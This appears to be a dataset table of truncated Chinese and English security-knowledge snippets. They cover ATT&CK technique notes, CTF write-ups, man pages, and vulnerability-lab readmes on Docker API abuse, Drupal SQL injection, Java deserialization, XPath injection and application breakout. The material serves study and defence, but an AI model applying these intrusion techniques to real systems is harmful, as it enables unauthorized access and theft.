text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
# T1594-搜索受害者所拥有的网站
## 来自ATT&CK的描述
攻击者可能会搜索目标组织拥有的网站,以获取可在目标攻击中使用的信息。目标组织拥有的网站可能包含各种细节,包括部门/分部的名称、物理位置和关键员工的数据,如姓名、角色和联系信息(例如:电子邮件地址)。这些网站还可能有突出商业运作和关系的细节。
攻击者可能会搜索目标组织拥有的网站,以收集可操作的信息。来自这些来源的信息可能会提供其他形式的侦察机会(例如:钓鱼信息或搜索开放式技术数据库),建立业务资源(例如:建立账户或破坏账户)或初始访问(例如:信任关系或钓鱼)。
## 测试案例
个人理解:收集网站上公布的人事信息(政府网站居多)、管理员邮箱信息等。
## 检测日志
无... | sec-knowleage |
# 4-Base64
---
目标 T4.exe
使用 IDA 打开,找 main 函数,并做基本的分析,重命名函数
这次在17行出现了一个 sub_455A94 函数,双击进去
这个 sub_455A94 对 sub_45A3F0 做了一层封装,继续双击跟进下一级
这里可以看到 sub_45A3F0 的细节,寻找关键数字常量,比如多次引用到 off_529000 全局资源
双击进入 off_529000,跳转到该资源存储的位置。
这里可以看到 off_529000 dd offset aAbcdefghijklmn 表示 off_529000 是一个全局的指针变量,保存了一个字符串的指针,指向的字符串为 aAbcdefghijkl... | sec-knowleage |
---
title: 列出存储桶里的对象
---
## 列出存储桶里的对象
使用以下命令,可以列出存储桶中的对象
```bash
cf alibaba oss obj ls
```
如果想指定获取对象的数量,可以使用 `-n` 或者 `--number` 参数
```bash
cf alibaba oss obj ls -n 100
```
在有些情况下,当前 AK 可能会没有列出 Bucket 的权限,如果你知道 Bucket 的名称,可以使用 `-b` 指定 Bucket
```bash
cf alibaba oss ls -b bucket_name
```
这时可能会碰到没有获取 Bucket 区域的情况,加上 `-r` 参... | sec-knowleage |
# Marinated Salad
Category: Cryptography
## Description
> Excuse me waiter, P Dvbsk sprl h Jhlzhy Zhshk dpao
>
> okarozuvaf{C1tqF3y3_f0dJf_v_Y34F_c1a4uYy3Gfw_wy3MKl}
## Solution
If we run `"P Dvbsk sprl h Jhlzhy Zhshk dpao okarozuvaf{C1tqF3y3_f0dJf_v_Y34F_c1a4uYy3Gfw_wy3MKl}"` through ROT-19, we get:
```console
root@... | sec-knowleage |
# 5. 替换空格
## 题目链接
[牛客网](https://www.nowcoder.com/practice/0e26e5551f2b489b9f58bc83aa4b6c68?tpId=13&tqId=11155&tab=answerKey&from=cyc_github)
## 题目描述
将一个字符串中的空格替换成 "%20"。
```text
Input:
"A B"
Output:
"A%20B"
```
## 解题思路
① 在字符串尾部填充任意字符,使得字符串的长度等于替换之后的长度。因为一个空格要替换成三个字符(%20),所以当遍历到一个空格时,需要在尾部填充两个任意字符。
② 令 P1 指向字符串原来的末尾位置,P... | sec-knowleage |
# Anonymous
Category: Steganography
## Description
> **Blast from the Past challenges series**
>
> In 2017, Anonymous hacked lectures and tutorials to promote the 2nd faculty party, they even hid a message in one of the frames...
A PNG file was attached.
## Solution
Running `zsteg` on the file reveals the flag:
```con... | sec-knowleage |
# Ransom 2.0, RE, 150pts
> In theory, this firmware mod was supposed to give you 30% extra horsepower and torque. In reality, it's something different. For real this time.
This is the exact same challenge as `Ransom`, except this time
with the password checking bugfix. Reversing the code checking
routine revealed the u... | sec-knowleage |
'\"
'\" Copyright (c) 1995-1996 Sun Microsystems, Inc.
'\"
'\" See the file "license.terms" for information on usage and redistribution
'\" of this file, and for a DISCLAIMER OF ALL WARRANTIES.
'\"
'\" RCS: @(#) $Id: fconfigure.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $
'\"
'\" The definitions below are for supplemental... | sec-knowleage |
# Docker daemon api unauthorized access exploit
[中文版本(Chinese version)](README.zh-cn.md)
Reference Links:
- http://www.loner.fm/drops/#!/drops/1203.%E6%96%B0%E5%A7%BF%E5%8A%BF%E4%B9%8BDocker%20Remote%20API%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%92%8C%E5%88%A9%E7%94%A8
##... | sec-knowleage |
.\" auto-generated by docbook2man-spec $Revision: 1.1 $
.TH "TRUNCATE" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands"
.SH NAME
TRUNCATE \- 清空一个表
.SH SYNOPSIS
.sp
.nf
TRUNCATE [ TABLE ] \fIname\fR
.sp
.fi
.SH "DESCRIPTION 描述"
.PP
\fBTRUNCATE\fR 快速地从一个表中删除所有行。它和无条件的 DELETE 有同样的效果,不过因为它不做表扫描,因而快得多。 在大表上最有用。
.... | sec-knowleage |
# Photo Gallery
## [Flag0](./flag0) -- Found
- Consider how you might build this system yourself. What would the query for fetch look like?
- Take a few minutes to consider the state of the union
- This application runs on the uwsgi-nginx-flask-docker image
## [Flag1](./flag1) -- Found
- I never trust a kitten I can't ... | sec-knowleage |
from flask import Flask, flash, get_flashed_messages, make_response, redirect, render_template_string, request
from os import path, unlink
from PIL import Image
import tempfile
app = Flask(__name__)
app.secret_key = "0123456789ABCDEF"
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method... | sec-knowleage |
# Sedna
> https://download.vulnhub.com/hackfest2016/Sedna.ova
靶场IP:`192.168.32.197`
扫描对外端口服务
```
┌──(root💀kali)-[/tmp]
└─# nmap -p 1-65535 -sV 192.168.32.197
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-02 03:56 EDT
Nmap scan report for 192.168.32.197
Host is up (0.0017s latency).
Not shown: 65523 closed tcp por... | sec-knowleage |
# BMP
---
## 什么是BMP
BMP(全称 Bitmap)是 Windows 操作系统中的标准图像文件格式,可以分成两类:设备有向量相关位图(DDB)和设备无向量相关位图(DIB),使用非常广。它采用位映射存储格式,除了图像深度可选以外,不采用其他任何压缩,因此,BMP 文件所占用的空间很大。BMP 文件的图像深度可选 lbit、4bit、8bit 及 24bit。BMP 文件存储数据时,图像的扫描方式是按从左到右、从下到上的顺序。由于 BMP 文件格式是 Windows 环境中交换与图有关的数据的一种标准,因此在 Windows 环境中运行的图形图像软件都支持 BMP 图像格式。
典型的 BMP 图像文件由四部分组成:
... | sec-knowleage |
nano
===
字符终端文本编辑器
## 补充说明
**nano** 是一个字符终端的文本编辑器,有点像DOS下的editor程序。它比vi/vim要简单得多,比较适合Linux初学者使用。某些Linux发行版的默认编辑器就是nano。
nano命令可以打开指定文件进行编辑,默认情况下它会自动断行,即在一行中输入过长的内容时自动拆分成几行,但用这种方式来处理某些文件可能会带来问题,比如Linux系统的配置文件,自动断行就会使本来只能写在一行上的内容折断成多行了,有可能造成系统不灵了。因此,如果你想避免这种情况出现,就加上`-w`选项吧。
### 语法
```shell
nano [选项] [[+行,列] 文件名]...
```
... | sec-knowleage |
# Baby DLP (crypto)
## ENG
[PL](#pl-version)
In the task we get [server code](server.py) to analyse.
In short we can send to the server a number `s` and server responds with `c = pow(2, flag ^ s, p)`.
Our goal is, of course, to recover the flag.
As the taks name suggests, if we could calculate discrete logarithm, we co... | sec-knowleage |
hostid
===
显示当前主机的十六进制数字标识。
## 概要
```shell
hostid [OPTION]...
```
## 主要用途
- 显示当前主机的十六进制标识符。
- 用来限制软件的使用权限,不可改变。
## 选项
```shell
--help 显示帮助信息并退出。
--version 显示版本信息并退出。
```
## 例子
```shell
[root@localhost ~]# hostid
007f0100
```
### 注意
1. 该命令是`GNU coreutils`包中的命令,相关的帮助信息请查看`man -s 1 hostid`,`info coreutils 'hostid... | sec-knowleage |
## SRM (Reverse, 50p)
> The flag is : The valid serial number
> [Download](RM.exe)
###ENG
[PL](#pl-version)
We downloaded windows binary and run it. It asks us to enter serial and checks its validity.
We disasembled it, and checked content of its DialogFunc. We can clearly see interesting fragment:
```c
if (strlen(v13... | sec-knowleage |
# T1218-002-win-签名的二进制代理执行:控制面板
## 来自ATT&CK的描述
攻击者可能滥用control.exe代理恶意负载的执行。 Windows“控制面板”进程二进制文件(control.exe)处理“控制面板”项的执行,“控制面板”项是使用户可以查看和调整计算机设置的实用程序。
控制面板项目是注册的可执行文件(.exe)或控制面板(.cpl)文件,后者实际上是重命名的动态链接库(.dll)文件,它们导出CPlApplet函数。为了易于使用,“控制面板”项通常包括在注册并加载到“控制面板”中后可供用户使用的图形菜单。可以从命令行直接执行控制面板项目,可以通过应用程序编程接口(API)调用以编程方式执行,也可以直... | sec-knowleage |
# twofi软件包描述
当尝试破解密码时,自定义单词列表对于标准字典是非常有用的补充。 最初在“7 Habits of Highly Effective Hackers”博客上发布的一个有趣想法是,使用Twitter来搜索与正在破解的列表相关的关键字,以帮助生成这些自定义单词列表。 这个想法扩展进了twofi,它采用多个搜索关键字来返回单词列表,并按最常见的在前进行排序。
资料来源:http://www.digininja.org/projects/twofi.php
[twofi主页](http://www.digininja.org/projects/twofi.php) | [Kali twofi资源](http://git... | sec-knowleage |
# 正则表达式
<!-- GFM-TOC -->
* [正则表达式](#正则表达式)
* [一、概述](#一概述)
* [二、匹配单个字符](#二匹配单个字符)
* [三、匹配一组字符](#三匹配一组字符)
* [四、使用元字符](#四使用元字符)
* [五、重复匹配](#五重复匹配)
* [六、位置匹配](#六位置匹配)
* [七、使用子表达式](#七使用子表达式)
* [八、回溯引用](#八回溯引用)
* [九、前后查找](#九前后查找)
* [十、嵌入条件](#十嵌入条件)
* [参考资料](#参考资料)
<!-- GFM-TOC -->
... | sec-knowleage |
# 25. 合并两个排序的链表
[NowCoder](https://www.nowcoder.com/practice/d8b6b4358f774294a89de2a6ac4d9337?tpId=13&tqId=11169&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github)
## 题目描述
<div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/c094d2bc-ec7... | sec-knowleage |
---
title: Brave Browser
date: 2022-11-23 16:23:31.698868
background: bg-[#da6b37]
label:
tags:
-
-
categories:
- Keyboard Shortcuts
intro: |
A visual cheat-sheet for the 64 keyboard shortcuts found in the Brave browser
---
Keyboard Shortcuts {.cols-2}
------------------
### Tabs and Windows
Shortcu... | sec-knowleage |
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5.
.\"*******************************************************************
.\"
.\" This file was generated with po4a. Translate the source file.
.\"
.\"*******************************************************************
.TH RMDIR 1 2022年9月 "GNU coreutils 9.... | sec-knowleage |
# Summary
* [前言](README.md)
* [Preface](README_EN.md)
* [目录](Content/Contents.md)
* [第一章:生](Content/Contents.md)
* [1-10课](Content/1-10.md)
* [第一课:windows提权-快速查找exp](Chapter1/1_windows提权-快速查找exp.md)
* [第二课:Linux提权-依赖exp篇](Chapter1/2_Linux提权-依赖exp篇.md)
* [第三课:Delphi代码审计--项目实战1](Chapter1/3_D... | sec-knowleage |
### 磁盘内存分析常用工具
- EasyRecovery
- MedAnalyze
- FTK
- [Elcomsoft Forensic Disk Decryptor](https://ctf-wiki.github.io/ctf-tools/misc/#_6)
- Volatility
### 磁盘相关介绍
常见的磁盘分区格式有以下几种
- Windows: FAT12 -> FAT16 -> FAT32 -> NTFS
- Linux: EXT2 -> EXT3 -> EXT4
- FAT 主磁盘结构
- 删除文件:目录表中文件名第一字节 `e5`。
### VMDK文件介绍
VMDK 文... | sec-knowleage |
# you can override this using by setting a system property, for example -Des.logger.level=DEBUG
es.logger.level: INFO
rootLogger: ${es.logger.level}, console
logger:
# log action execution errors for easier debugging
action: DEBUG
# reduce the logging for aws, too much is logged under the default INFO
com.amazo... | sec-knowleage |
bzcat
===
不解压,直接查看指定的.bz2文件
## 补充说明
**bzcat命令** 无需解压缩指定的.bz2文件,即可显示解压缩后的文件内容。
### 语法
```shell
bzcat(参数)
```
### 参数
.bz2压缩文件:指定要显示内容的.bz2压缩文件。
### 实例
将`/tmp/man.config`以bzip2格式压缩:
```shell
bzip2 -z man.config
```
此时man.config会变成man.config.bz2
将上面的压缩文件内容读出来:
```shell
bzcat man.config.bz2
```
此时屏幕上会显示 man.config.bz2 解压... | sec-knowleage |
# Writeup Hack.lu CTF 2015
Uczestniczyliśmy (msm, Rev, Shalom, other019, nazywam i pp) w Hack.lu CTF, i znowu spróbujemy opisać zadania z którymi walczyliśmy (a przynajmniej te, które pokonaliśmy).
Ogólne wrażenia:
- CTF w środku tygodnia = bardzo słaby pomysł bo wszyscy w pracy albo w szkole więc na CTFa zostaje tylko... | sec-knowleage |
.\" Chinese Version Copyright riser, checker :meaculpa
.\" Copyright (c) 1998 Sendmail, Inc. All rights reserved.
.\" Copyright (c) 1988, 1991, 1993
.\" The Regents of the University of California. All rights reserved.
.\"
.\" By using this file, you agree to the terms and conditions set
.\" forth in the LICENSE file... | sec-knowleage |
.\" Copyright 1993 David Metcalfe (david@prism.demon.co.uk)
.\"
.\" Permission is granted to make and distribute verbatim copies of this
.\" manual provided the copyright notice and this permission notice are
.\" preserved on all copies.
.\"
.\" Permission is granted to copy and distribute modified versions of this
.\"... | sec-knowleage |
# T1083-win-文件和目录发现
## 来自ATT&CK的描述
攻击者可以枚举文件和目录,也可以在主机或网络共享的特定位置搜索文件系统中的某些信息。攻击者可以在自动发现期间使用文件和目录发现中的信息来塑造后续行为,包括攻击者是否完全感染目标和/或尝试特定操作。
## 测试案例
windows
用于获取此信息的示例实用程序有dir和tree。还可以使用自定义工具收集文件和目录信息,并与Windows API交互。
Mac和Linux
在Mac和Linux中,这种发现是通过ls、find和locate命令完成的。
## 检测日志
windows安全日志
## 测试复现
这里主要演示windows主机下执行dir命令以及tree命令... | sec-knowleage |
# T1589-001-收集目标组织身份信息-凭证
## 来自ATT&CK的描述
在入侵受害者之前,攻击者可能会收集凭证信息,这些信息可以在目标定位期间使用。攻击者收集的帐户凭据可以是与目标受害者组织直接相关的凭据,也可以尝试利用用户倾向于在个人帐户和企业帐户中使用相同密码的趋势。
攻击者可以通过各种方式收集此信息,例如通过[钓鱼](https://contribute.knowledge.qihoo.net/detail/technique/T1598)。攻击者还可能入侵站点,然后植入旨在收集访问者网站认证cookie的恶意内容(引自:ATT ScanBox)。凭证信息也可能通过在线或其他可访问的数据集(例如:[搜索引擎](htt... | sec-knowleage |
# 数据访问
**什么是JDBC?**
Java 数据库连接(Java Database Connectivity,简称 JDBC)是 Java 语言中用来规范客户端程序如何来访问数据库的应用程序接口,提供了诸如查询和更新数据库中数据的方法。JDBC 也是 Sun Microsystems 的商标。我们通常说的 JDBC 是面向关系型数据库的。
JDBC API 主要位于 JDK 中的 java.sql 包中(之后扩展的内容位于 javax.sql 包中),主要包括(斜体代表接口,需驱动程序提供者来具体实现):
- DriverManager:负责加载各种不同驱动程序(Driver),并根据不同的请求,向调用者返回相应的数据库连接(... | sec-knowleage |
# 迷宫问题
迷宫问题有以下特点:
* 在内存中布置一张"地图"
* 将用户输入限制在少数几个字符范围内.
* 一般只有一个迷宫入口和一个迷宫出口
布置的地图可以由可显字符(比如`#`和`*`)组合而成(这非常明显, 查看字符串基本就知道这是个迷宫题了.), 也可以单纯用不可显的十六进制值进行表示. 可以将地图直接组成一条非常长的字符串, 或是一行一行分开布置. 如果是一行一行分开布置的话, 因为迷宫一般都会比较大, 所以用于按行(注意, 布置并非按顺序布置, 每行都对应一个具体的行号, 你需要确定行号才能还原迷宫地图)布置迷宫的函数会明显重复多次.
而被限制的字符通常会是一些方便记忆的组合(不是也没办法), 比如`w/s/a... | sec-knowleage |
# Application Escape and Breakout
## Summary
* [Gaining a command shell](#gaining-a-command-shell)
* [Sticky Keys](#sticky-keys)
* [Dialog Boxes](#dialog-boxes)
* [Creating new files](#creating-new-files)
* [Open a new Windows Explorer instance](#open-a-new-windows-explorer-instance)
* [Exploring Context Me... | sec-knowleage |
# 27. 二叉树的镜像
[牛客网](https://www.nowcoder.com/practice/a9d0ecbacef9410ca97463e4a5c83be7?tpId=13&tqId=11171&tab=answerKey&from=cyc_github)
## 题目描述
<div align="center"> <img src="https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/0c12221f-729e-4c22-b0ba-0dfc909f8adf.jpg" width="300"/> </div><br>
## 解题思路
```java
publ... | sec-knowleage |
# 守护进程
---
Linux 服务器在启动时需要启动很多系统服务,它们向本地和网络用户提供了 Linux 的系统功能接口,直接面向应用程序和用户。提供这些服务的程序是由运行在后台的守护进程来执行的。守护进程是生存期长的一种进程。它们独立于控制终端并且周期性的执行某种任务或等待处理某些发生的事件。他们常常在系统引导装入时启动,在系统关闭时终止。linux 系统有很多守护进程,大多数服务器都是用守护进程实现的。同时,守护进程完成许多系统任务,比如,作 业规划进程 crond、打印进程 lqd 等。有些书籍和资料也把守护进程称作:“服务”。
守护进程,也就是指 daemon 和 service。
---
## 守护进程的分类
根据守护... | sec-knowleage |
### Regasm简介:
Regasm 为程序集注册工具,读取程序集中的元数据,并将所需的项添加到注册表中。RegAsm.exe是Microsoft Corporation开发的合法文件进程。它与Microsoft.NET Assembly Registration Utility相关联。
**说明:**Regasm.exe所在路径没有被系统添加PATH环境变量中,因此,REGASM命令无法识别。
具体参考微软官方文档:
https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool
基于白名单Regas... | sec-knowleage |
# T1036-003-win-重命名程序名称
## 来自ATT&CK的描述
攻击者可能会重命名合法的系统实用程序,以试图规避有关这些实用程序使用的安全机制。安全监视和控制机制可能适用于攻击者能够滥用的系统实用程序。可以通过在使用之前重命名实用程序来绕过这些安全机制(例如: rename `rundll32.exe`)。当合法实用程序被复制或移动到不同的目录并重命名以避免基于从非标准路径执行的系统实用程序的检测。
## 测试案例
Masquerading是为了逃避蓝队的查找,而进行的伪装.其中的一种方法是可执行文件放在一个通常受信任的目录中,或者给它一个合法的名字.或者文件名是一个和受信任文件相似的文件名.其中一个情况就是当com... | sec-knowleage |
.\"Generated by db2man.xsl. Don't modify this, modify the source.
.de Sh \" Subsection
.br
.if t .Sp
.ne 5
.PP
\fB\\$1\fR
.PP
..
.de Sp \" Vertical space (when we can't use .PP)
.if t .sp .5v
.if n .sp
..
.de Ip \" List item
.br
.ie \\n(.$>=3 .ne \\$3
.el .ne 3
.IP "\\$1" \\$2
..
.TH "SMBD" 8 "" "" ""
.SH NAME
smbd \- ... | sec-knowleage |
# DC 7
下载地址:https://download.vulnhub.com/dc/DC-7.zip
## 实战演练
靶场IP地址:`192.168.32.166`

扫描对外端口
```
┌──(root💀kali)-[~]
└─# nmap -p1-65535 192.168.32.166 ... | sec-knowleage |
# Java Deserialization
## Detection
- `"AC ED 00 05"` in Hex
* `AC ED`: STREAM_MAGIC. Specifies that this is a serialization protocol.
* `00 05`: STREAM_VERSION. The serialization version.
- `"rO0"` in Base64
- Content-type = "application/x-java-serialized-object"
- `"H4sIAAAAAAAAAJ"` in gzip(base64)
## Tools
### Y... | sec-knowleage |
'\"
'\" Copyright (c) 1994 The Regents of the University of California.
'\" Copyright (c) 1994-1996 Sun Microsystems, Inc.
'\"
'\" See the file "license.terms" for information on usage and redistribution
'\" of this file, and for a DISCLAIMER OF ALL WARRANTIES.
'\"
'\" RCS: @(#) $Id: clipboard.n,v 1.2 2003/11/24 05:09... | sec-knowleage |
rlogin
===
从当前终端登录到远程Linux主机
## 补充说明
**rlogin命令** 用于从当前终端登录到远程Linux主机。
### 语法
```shell
rlogin(选项)(参数)
```
### 选项
```shell
-8:允许输入8位字符数据;
-e脱离字符>:设置脱离字符;
-E:滤除脱离字符;
-l用户名称>:指定要登入远端主机的用户名称;
-L:使用litout模式进行远端登入阶段操作。
```
### 参数
远程主机:指定要登录的远程主机(ip地址或者域名)。 | sec-knowleage |
---
title: Sublime Text
date: 2022-11-23 16:23:31.695666
background: bg-[#e8973e]
label:
tags:
-
-
categories:
- Keyboard Shortcuts
intro: |
A visual cheat-sheet for the 49 keyboard shortcuts found in Sublime Text
---
Keyboard Shortcuts
------------------
### Editing {.row-span-3}
Shortcut | Action... | sec-knowleage |
# Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。
## 漏洞环境
执行如下命令启动Drupal 7.31环境:
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8080`即可看到Drupal的安装页面,使用默认配置安装即可。
其中,Mysql数据库名填写`drupal`,数据库用户名、密码为`root`,地址为`mysql`:

### 请求方法
方法(参数) | 描述
----------------------------------- | ----------------------... | sec-knowleage |
### Arm ROP预备知识
先看一下 arm 下的函数调用约定,函数的第 1 ~ 4 个参数分别保存在 **r0 ~ r3** 寄存器中, 剩下的参数从右向左依次入栈, 被调用者实现栈平衡,函数的返回值保存在 **r0** 中
除此之外,arm 的 **b/bl** 等指令实现跳转; **pc** 寄存器相当于 x86 的 eip,保存下一条指令的地址,也是我们要控制的目标 | sec-knowleage |
## Tonnerre (Crypto, 200 points, 119 solves)
We were pretty sure the service at tonnerre.pwning.xxx:8561 (source) was totally secure.
But then we came across this website and now we’re having second thoughts...
We think they store the service users in the same database?
###ENG
[PL](#pl-version)
This task consisted... | sec-knowleage |
# Bad Route
* Category: Web
* 200 Points
* Solved by the JCTF Team
## Description
> Our company belive that if we go on the bad route of environment pollution we have a direct effect on human health.
>
> However, some energy companies that are destroying the planet are tried to takedown our website.
>
> Your mission ... | sec-knowleage |
# pastaAAA
Forensics, 350 points
## Description:
> This pasta is up to no good. There MUST be something behind it.

## Solution:
Using `stegsolve` or [this online tool](https://georgeom.net/StegOnline/image), it's possible to browse through all available planes.
We eventually find the following h... | sec-knowleage |
## tcache makes heap exploitation easy again
### 0x01 Tcache overview
在 tcache 中新增了两个结构体,分别是 tcache_entry 和 tcache_perthread_struct
```C
/* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache. */
typedef struct tcache_entry
{
struct tcache_entry *next;
} tca... | sec-knowleage |
# T1105-win-命令提示符网络链接
## 来自ATT&CK的描述
攻击者可能会将工具或其他文件从外部系统转移到被攻陷的环境中。可以通过命令控制通道从外部攻击者控制的系统中复制文件,以便将工具带入被攻陷的网络环境中,或通过与另一个工具(如FTP)的替代协议复制文件。文件也可以在Mac和Linux上使用scp、rsync和sftp等本机工具进行复制。
## 测试案例
识别cmd.exe建立网络连接。攻击者可能滥用cmd.exe从远程URL下载或执行恶意软件。
参考文章:[渗透技巧——通过cmd上传文件的N种方法](https://www.secpulse.com/archives/44450.html)
## 检测日志
wind... | sec-knowleage |
# 磁盘内存分析
## 常用工具
- EasyRecovery
- MedAnalyze
- FTK
- [Elcomsoft Forensic Disk Decryptor](https://ctf-wiki.github.io/ctf-tools/misc/#_6)
- Volatility
## 磁盘
常见的磁盘分区格式有以下几种
- Windows: FAT12 -> FAT16 -> FAT32 -> NTFS
- Linux: EXT2 -> EXT3 -> EXT4
- FAT 主磁盘结构
- 删除文件:目录表中文件名第一字节 `e5`。
## VMDK
VMDK 文件本质上是物理硬... | sec-knowleage |
.\" Copyright (c) 1992 Drew Eckhardt (drew@cs.colorado.edu), March 28, 1992
.\"
.\" Permission is granted to make and distribute verbatim copies of this
.\" manual provided the copyright notice and this permission notice are
.\" preserved on all copies.
.\"
.\" Permission is granted to copy and distribute modified vers... | sec-knowleage |
# 入侵检测&防护系统概述
## 1. 概念
## 2. 标准模型与架构
## 3. 分类
## 4. 功能与技术
### 4.1 入侵分析技术
### 4.2 入侵响应技术
## 5. 性能与指标体系
## 6. 选用依据
## 7. 部署方式
## 8. 不足之处
## 9. 发展趋势 | sec-knowleage |
# Pwn1
Pwn, 227 points
## Description:
A binary file was attached, in addition to an address and port.
## Solution:
Let's run the binary:
```console
root@kali:/media/sf_CTFs/tamu/Pwn1# ./pwn1
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?... | sec-knowleage |
# Vuex
Vuex 是一个专为 Vue.js 应用程序开发的状态管理模式,类似 React 中的 Redux
### 装包
```
npm install vuex --save
```
### 注入 store
导入 store
```javascript
import store from './store'
```
将 store 注入到组件中
```javascript
new Vue({
el: '#app',
store,
router,
template: '<App/>',
components: { App }
})
```
### 创建 store
我们这里根据官网给出的例子,创建 sto... | sec-knowleage |
uucico
===
UUCP文件传输服务程序
## 补充说明
**uucico命令** 命令UUCP文件传输服务程序。 uucico是用来处理uucp或uux送到队列的文件传输工具。uucico有两种工作模式:主动模式和附属模式。当在主动模式下时,uucico会调用远端主机;在附属模式下时,uucico则接受远端主机的调用。
### 语法
```shell
uucico [-cCDefqvwz][-i<类型>][-I<文件>][-p<连接端口号码>][-][-rl][-s<主机>][-S<主机>][-u<用户>][-x<类型>][--help]
```
### 选项
```shell
-c或--quiet 当不执行任何工作时,... | sec-knowleage |
# Lua
---
**官网**
- http://www.lua.org/
**教程**
- https://www.runoob.com/lua/lua-tutorial.html
---
## 环境安装
**Linux 系统上安装**
```
curl -R -O http://www.lua.org/ftp/lua-5.4.3.tar.gz
tar zxf lua-5.4.3.tar.gz
cd lua-5.4.3
make linux test
make install
```
其他版本如果报错需要装
```bash
# centos
yum install readline-devel
# debian
apt-get ... | sec-knowleage |
# XPATH Injection
> XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
## Summary
* [Exploitation](#exploitation)
* [Blind exploitation](#blind-exploitation)
* [Out Of Band Exploitation](#out-o... | sec-knowleage |
# 内核下载与编译
首先,我们需要下载并编译内核。
## 下载内核
我们可以从 `https://www.kernel.org` 下载想要的内核。根据 https://www.kernel.org/category/releases.html,我们可以知道内核主要有以下几种类别:
- Prepatch
- Mainline
- Stable
- Longterm
这里我们选择长期支持版。
下面为了方便介绍,我们使用 `5.4` 版本,内核开发者会一直支持这个版本到 2025 年 12 月份。进一步地,我们选择 5.4 的最新版本 5.4.98(2021 年 2 月记录)。为了加速,我们可以选择就近的源来下载内核,这里使用清华源:ht... | sec-knowleage |
目
第 1 章 通过原则和策略的安全治理……….
1
川 理解和应用机密性、 完整性
和可用性的概念.........…................2
1.1.1 机密性…................................2
1.1.2 完整性……………….......….. …3
1.1.3 可用性.........................….......4
1.1.4 其他安 全概念…......................5
1.1.5 保护机制...........................…..8
1 .
2 应用安全治理原则…..........…........9
1.2.1 安 全... | sec-knowleage |
import os
from Crypto.Cipher import AES
def crc32(crc, data):
crc = 0xFFFFFFFF ^ crc
for c in data:
crc = crc ^ ord(c)
for i in range(8):
crc = (crc >> 1) ^ (0xEDB88320 * (crc & 1))
return 0xFFFFFFFF ^ crc
key = b""
crc = 0
for i in range(int("1" * 10000)):
crc = crc32(crc, "TSG")
assert(crc ==... | sec-knowleage |
# T1564-003-windwos-隐藏窗口
## 来自ATT&CK的描述
攻击者可以使用隐藏的窗口将恶意活动隐藏在用户的视线范围之外。在某些情况下,可以隐藏通常在应用程序执行操作时显示的窗口。系统管理员可以利用它来避免在执行管理任务时破坏当前用户的工作环境。
在Windows上,Windows中的脚本语言具有多种功能,例如PowerShell,Jscript和Visual Basic,可以隐藏窗口。一个典型示例就是powershell.exe -WindowStyle Hidden。
同样,在macOS上,属性列表(plist)文件中列出了应用程序运行方式的配置。这些文件中的标记之一可以是apple.awt.UIElement... | sec-knowleage |
# T1202-win-间接命令执行-基于Explorer.exe执行payload(白名单)
## 来自ATT&CK的描述
可以使用各种Windows实用程序来执行命令,而不需要调用cmd。例如,Forfiles、程序兼容性助手(pcalua.exe)、WSL(WindowsSubsystem for Linux)组件以及其他实用程序可以从命令行界面、运行窗口或通过脚本来调用程序和命令的执行。
攻击者可能会滥用这些功能来规避防御,尤其是在破坏检测和/或缓解控制(如组策略)的同时执行任意动作。(这些控制限制/阻止了cmd或恶意负载相关文件扩展名的使用。)
## 测试案例
Explorer.exe用于在Windows中管理文件和系统组... | sec-knowleage |
# 41.1 数据流中的中位数
## 题目链接
[牛客网](https://www.nowcoder.com/practice/9be0172896bd43948f8a32fb954e1be1?tpId=13&tqId=11216&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github)
## 题目描述
如何得到一个数据流中的中位数?如果从数据流中读出奇数个数值,那么中位数就是所有数值排序之后位于中间的数值。如果从数据流中读出偶数个数值,那么中位数就是所有数值排序之后中间两个数的平均值。
## 解... | sec-knowleage |
# Level12
#### About
There is a backdoor process listening on port 50001.
To do this level, log in as the level12 account with the password level12. Files for this level can be found in /home/flag12.
#### Source Code
```
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 50001))
function ... | sec-knowleage |
.TH ProgressBar 3tk "tcllib - BWidget"
.SH NAME
.B ProgressBar - 进度指示器组件
.SH 创建 CREATION
.B ProgressBar pathName ?option value...?
.SH 描述 DESCRIPTION
ProgressBar 组件向用户指示一个冗长的操作的进度。它通常用于 MainFrame 和 ProgressDlg。
.SH 组件特有选项 WIDGET-SPECIFIC OPTIONS
.TP
-height
为进度指示器指定想要的高度。
.TP
-maximum
指定变量的最大值。
.TP
-type
指定 Pro... | sec-knowleage |
# Unknown - Aboard boat
Category: Net
## Description
> That was close! The armed guard didn’t notice you. The floor shakes, the boat is leaving the harbor. You are trying to stay hidden. You see two guards coming your way, you sneak into a small scrubber, they pass it, but then one of the guards takes out his phone and... | sec-knowleage |
## FTP2 (pwn, 300p, ? solves)
### PL
[ENG](#eng-version)
> nc 54.172.10.117 12012
> [ftp_0319deb1c1c033af28613c57da686aa7](ftp)
Pobieramy zalinkowany plik i ładujemy do IDY. Jest to faktycznie, zgodnie z opisem, serwer FTP - ten sam co w zadaniu FTP (re 300).
Wiemy że flaga znajduje się gdzieś na serwerze. Mamy też use... | sec-knowleage |
# USB
## 简介
**USB详述**: [https://www.usb.org/sites/default/files/documents/hut1_12v2.pdf](https://www.usb.org/sites/default/files/documents/hut1_12v2.pdf)
